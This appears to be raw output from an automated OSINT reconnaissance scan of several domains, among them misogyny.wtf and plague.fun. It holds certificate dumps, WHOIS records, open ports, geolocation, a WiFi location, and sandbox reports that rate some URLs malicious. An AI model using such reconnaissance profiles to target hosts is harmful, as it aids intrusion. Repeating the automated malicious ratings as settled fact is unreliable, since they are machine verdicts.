77aaa4331c29fd8a-ORD 188.114.97.1 2022-12-18 00:04:01 Country No Country Name Extractor 0 0 4 0 None United States webapps.net 2022-12-18 00:08:41 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:2c:85:5d:bb:57:90:dc:e7:0e:c1:fb:19:64:4d: ed:ef:1a:0f:25:57:66:e4:78:e3:5f:76:69:98:83:4f:9e:d6: 0e:92:0e:dc:62:fc:84:10:12:13:a6:68:99:e0:70:95:02:30: 43:a3:8d:79:ff:59:63:32:3d:8c:92:53:12:59:3a:b1:60:01: 58:91:c2:32:0d:d7:e9:cb:b7:70:ff:a3:a2:56:80:bd:93:6a: 54:5c:52:12:8b:bd:3b:4e:9b:aa:4c:e2 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None vapor (Net ID: 00:02:2D:09:FB:FD) 37.780462,-122.390564 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None fala00001.falab000bella.repl.co 34.149.204.188 2022-12-18 00:06:31 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.147.230:8443 172.67.147.230 2022-12-18 00:18:31 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.13:80 188.114.97.0/24 2022-12-18 00:03:27 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:54:d1:cf:73:f4:06:da:67:36:31:1b:04:19:11:b7:02:21 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:41:57 2022 GMT Not After : Jun 6 17:41:56 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:99:c4:36:4d:b6:7c:39:c2:f1:77:60:a8:ba:f8: 1c:59:3e:dd:96:42:44:67:b8:8b:49:69:58:1a:9d: ae:aa:d4:88:d9:2c:d6:c2:df:95:1d:df:ac:20:80: f6:6c:90:00:e7:ce:f6:99:5d:a6:86:c6:4c:71:e4: 0a:11:87:6e:9d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 7C:C0:30:0A:42:D8:F4:C5:D8:B9:9F:B1:0D:6A:DF:8F:DE:76:96:BE X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:73:c9:51:81:24:54:60:50:42:94:ed:53:88:10: 89:96:e7:79:87:b5:b8:53:60:60:89:dc:82:36:ca:08:8a:16: 39:38:0a:9b:7a:23:19:6f:4f:5a:30:1f:e5:6c:76:40:02:30: 3d:be:52:da:80:dc:a2:9d:50:94:22:a3:e3:f8:29:ec:b0:25: 63:d5:de:74:71:c9:c1:71:0e:8c:0d:1d:3a:6e:b9:c4:0a:9e: 23:22:2b:9c:de:86:d5:f4:68:f3:3f:5b 2022-12-18 00:20:59 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - 2606:4700:3033::6815:1cf0 2022-12-18 00:21:02 Netblock Membership No Censys 0 0 2 0 None 104.21.16.0/20 104.21.28.240 2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None United States 172.67.147.230 2022-12-18 00:25:40 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-186.w90-116.abo.wanadoo.fr 90.116.149.186 2022-12-18 00:31:11 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.faith Registry Domain ID: D40E9E8E1E2AB4C19B383C4976CE87C41-NSR Registrar WHOIS Server: https://porkbun.com/whois Registrar URL: www.porkbun.com Updated Date: 2022-11-20T04:29:54Z Creation Date: 2019-10-06T04:29:54Z Registry Expiry Date: 2023-10-06T04:29:54Z Registrar: Porkbun Registrar IANA ID: 1861 Registrar Abuse Contact Email: abuse@porkbun.com Registrar Abuse Contact Phone: +1.5038508351 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Private by Design, LLC Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: NC Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: curitiba.ns.porkbun.com Name Server: salvador.ns.porkbun.com Name Server: fortaleza.ns.porkbun.com Name Server: maceio.ns.porkbun.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:11Z <<< For more information on Whois status codes, please visit https://icann.org/epp The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is: * inconsistent with any applicable laws, * inconsistent with any policy issued by us, * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or * to enable high volume, automated, electronic processes that apply to the Service. You acknowledge that: * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered, * we may restrict, suspend or terminate your access to the Service at any time, and * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent. This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion. plague.faith 2022-12-18 00:04:04 Raw Data from RIRs No Hybrid Analysis 0 0 1 0 None {u'count': 5, u'search_terms': [{u'id': u'domain', u'value': u'misogyny.wtf'}], u'result': [{u'environment_id': 110, u'job_id': u'638f6278389c860b621ea62a', u'analysis_start_time': u'2022-12-06 15:40:40', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'3f181648f1364a23b7f272f4e60c08615f1febfa72b78e3c8d75daeaaa6d3110', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 110, u'job_id': u'638f600a6664a264d86af3b3', u'analysis_start_time': u'2022-12-06 15:30:19', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 33, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'c1c6183777a5ff13aeb0f503c548f30309a8058c37c93d6c8541614030f00fa5', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 110, u'job_id': u'638f5e1253d2ec57ca1854bd', u'analysis_start_time': u'2022-12-06 15:21:55', u'vx_family': u'Malicious site', u'av_detect': u'10', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 34, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'bdd3745faefe1c8fdb922e3671a3e342360d521a0f1fa974510813c51fb1913c', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 110, u'job_id': u'638f5c1808fc134fee52854a', u'analysis_start_time': u'2022-12-06 15:13:29', u'vx_family': u'Malicious site', u'av_detect': u'8', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 63, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'52243024bb50bb158cfb524a2623013b1733c9c67fee71e88d86ac5aeae8f36b', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 110, u'job_id': u'638f5a030d35cf1e924e752e', u'analysis_start_time': u'2022-12-06 15:04:36', u'vx_family': u'Malicious site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 12, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'33c924af831ebf0a78a69b3c46d21ee130387cbefb922390d78c5dcf642b6f61', u'type': None, u'type_short': u'url', u'size': 65}]} misogyny.wtf 2022-12-18 00:09:12 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.1:80 188.114.96.0/24 2022-12-18 00:22:08 Malicious Internet Name Yes Cleanbrowsing.org 0 1 2 0 None Blocked by Cleanbrowsing.org [mail.zerotwo-best-waifu.online] mail.zerotwo-best-waifu.online 2022-12-18 00:11:11 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.io Registry Domain ID: ea274f7d6870401abc6e330d5b2844e1-DONUTS Registrar WHOIS Server: whois.ovh.com Registrar URL: http://www.ovh.com Updated Date: 2022-12-07T05:21:22Z Creation Date: 2019-12-22T14:30:11Z Registry Expiry Date: 2023-12-22T14:30:11Z Registrar: OVH SAS Registrar IANA ID: 433 Registrar Abuse Contact Email: abuse@ovh.net Registrar Abuse Contact Phone: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: MT Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns111.ovh.net Name Server: ns111.ovh.net DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:11Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. plague.io 2022-12-18 00:14:32 Country No Country Name Extractor 0 1 3 0 None Canada Toronto, Ontario, ON, Canada, CA 2022-12-18 00:25:52 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [188.114.97.1] 188.114.97.1 2022-12-18 00:04:34 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 97, u'compromised_hosts': [u'104.21.28.240', u'104.16.86.20', u'5.45.205.244'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://romsmania.cc/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "iexplore.exe" (UID: 00000000-00003864) was launched with new environment variables: "PATH="%PROGRAMFILES%\\Internet Explorer;""\n Process "iexplore.exe" (UID: 00000000-00003864) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"\n Process "iexplore.exe" (UID: 00000000-00003864) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.207.6:80"\n "172.67.207.6:443"\n "104.21.28.240:443"\n "104.16.86.20:443"\n "77.88.21.119:443"\n "5.45.205.244:80"\n "154.47.36.158:443"\n "23.38.131.139:443"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")\n "IEXPLORE.EXE" (Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")\n "IEXPLORE.EXE" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "IEXPLORE.EXE" (Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "IEXPLORE.EXE" (Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"romsmania.cc"\n "yandex.ocsp-responder.com"\n "cdn.jsdelivr.net"\n "consolegames.down10.software"\n "mc.webvisor.org"\n "mc.yandex.ru"\n "subca.ocsp-certum.com"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-20', u'name': u'Reads Windows Trust Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")\n "IEXPLORE.EXE" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "http://romsmania.cc/" (UID: 00000000-00003864)\n Spawned process "IEXPLORE.EXE" with commandline "SCODEF:3864 CREDAT:275457 /prefetch:2" (UID: 00000000-00002776)'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\039EEDB80BE7A03C6953893B20D2D9323A4C2AFD"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\97817950D81C9670CC34D809CF794431367EF474"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\AD7E1C28B064EF8F6003402014C3D0E3370EB58A"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\91C6D6EE3E8AC86384E548C299295C756C817B81"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTENCODEDCTL")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE"; Key: "DISALLOWEDCERTLASTSYNCTIME")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\F18B538D1BE903B6A6F056435B171589CAF36BF2"; Key: "BLOB")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3864"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f18_IE_EarlyTabStart_0x4e4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f18_ConnHashTable<3864>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f18_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f18_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f18_IESQMMUTEX_0_331"\n "IsoScope_f18_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "http://romsmania.cc/" (UID: 00000000-00003864)\n Spawned process "IEXPLORE.EXE" with commandline "SCODEF:3864 CREDAT:275457 /prefetch:2" (UID: 00000000-00002776)'}, {u'category': u'Unusual Characteristics', u'origin': u'Registry Access', u'identifier': u'registry-26', u'name': u'Reads the windows installation language', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"IEXPLORE.EXE" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE"; Key: "INSTALLLANGUAGEFALLBACK")'}, {u'category': u'Unusual Characteristics', u'origin': u'Hook Detection', u'identifier': u'hooks-8', u'name': u'Installs hooks/patches the running process', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1179', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1179', u'relevance': 10, u'threat_level': 0, u'type': 11, u'description': u'"iexplore.exe" wrote bytes "5069d1f3fe070000" to virtual address "0xF4E040E0" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "b062d1f3fe070000" to virtual address "0xFF02BE80" (part of module "OLE32.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xFBDB6098" (part of module "VERSION.DLL")\n "iexplore.exe" wrote bytes "5007cff3fe070000" to virtual address "0xFDD41ED8" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "d060d1f3fe070000" to virtual address "0xFB4F1CC0" (part of module "COMCTL32.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xFE716FA0" (part of module "ADVAPI32.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xFD273330" (part of module "IERTUTIL.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xF4E02D78" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xFD8D2390" (part of module "GDI32.DLL")\n "iexplore.exe" wrote bytes "b062d1f3fe070000" to virtual address "0xFEE755B8" (part of modu 104.21.28.240 2022-12-18 00:13:51 Internet Name No DNS Brute-forcer 0 0 1 0 None www.zerotwo-best-waifu.online zerotwo-best-waifu.online 2022-12-18 00:59:52 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: misogyny.org Registry Domain ID: 306b87640a9a4177b66ed5ee2d15d5eb-LROR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-12-01T05:06:01Z Creation Date: 2000-01-03T07:35:22Z Registry Expiry Date: 2024-01-03T07:35:22Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of 